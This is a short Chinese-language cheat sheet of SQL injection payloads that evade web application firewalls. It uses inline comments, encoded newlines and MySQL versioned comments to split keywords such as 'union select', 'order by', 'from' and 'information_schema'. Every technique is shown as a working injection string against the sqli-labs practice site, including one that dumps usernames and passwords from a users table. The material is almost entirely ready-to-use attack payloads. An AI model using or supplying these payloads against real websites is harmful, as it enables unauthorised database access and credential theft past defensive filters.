一、绕过组合语句匹配机制(如union select、order by)
1./*/s*/
2./*/a*/%23%0a
用以上语句截断两个单词,如sqllib_less 1:
id=1' order/*/a*/%23%0aby 3--+
二、绕过数据库的一些关键函数
1./*!22222database%23%0a*//*/s*/()
例 sqllib_less 1:
id=-1' union/*/a*/%23%0aselect 1,/*!22222database%23%0a*//*/s*/(),3--+
三、绕过from关键字:
1./*/s*/%23%0afrom
例 sqllib_less 1:
id=-1' union/*/a*/%23%0aselect 1,2,group_concat(username,password)/*/s*/%23%0afrom users--+
三、绕过information_schema:
1./*!--+/*%0ainformation_schema./*!tables*/
id=-1' union/*/a*/%23%0aselect 1,2,group_concat(table_name)/*/s*/from /*!--+/*%0ainformation_schema./*!tables*/where table_schema='security'--+